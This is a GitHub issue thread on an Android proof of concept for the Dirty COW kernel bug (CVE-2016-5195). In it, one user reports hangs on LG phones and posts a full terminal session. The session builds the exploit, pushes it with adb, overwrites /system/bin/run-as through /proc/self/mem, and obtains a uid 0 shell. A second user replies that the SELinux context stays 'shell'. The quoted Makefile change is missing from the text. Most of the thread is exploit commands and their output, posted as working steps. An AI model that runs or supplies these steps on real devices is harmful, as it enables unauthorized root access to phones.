timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Exploit hangs, no SELinux errors #47

Open Svieg opened 7 years ago

Svieg commented 7 years ago

Sup!

I was testing the exploit with an LG G5 and a G4. The shell was hanging, but I wasn't getting any SELinux errors with `adb logcat | grep avc`, so I tried some things and found out that if you change the Makefile from

to

and call /system/bin/run-as manually, you get root.

demo:

~/S/CVE-2016-5195> make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23
make[1]: Entering directory '/home/svieg/Shared/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory '/home/svieg/Shared/CVE-2016-5195'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
198 KB/s (10056 bytes in 0.049s)
adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
220 KB/s (10056 bytes in 0.044s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (10056) and destination file size (14192) differ

[*] size 10056
[*] mmap 0x7fa684e000
[*] currently 0x7fa684e000=10102464c457f
[*] madvise = 0x7fa684e000 10056
[*] madvise = 0 31
[*] /proc/self/mem 30168 3
[*] exploited 0x7fa684e000=10102464c457f
adb shell
shell@h1:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
shell@h1:/ $ /system/bin/run
run-as runcon
shell@h1:/ $ /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@h1:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

GeneBlue commented 7 years ago

The context is still u:r:shell:s0, so it's useless.